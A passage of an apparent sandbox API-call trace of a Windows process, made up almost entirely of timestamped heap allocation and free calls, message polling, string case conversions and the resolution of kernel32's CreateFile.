hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0197.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.149] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.149] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0197.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0197.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.150] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0197.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0197.151] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0197.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.154] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.157] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0197.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba2e8 [0197.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba2e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 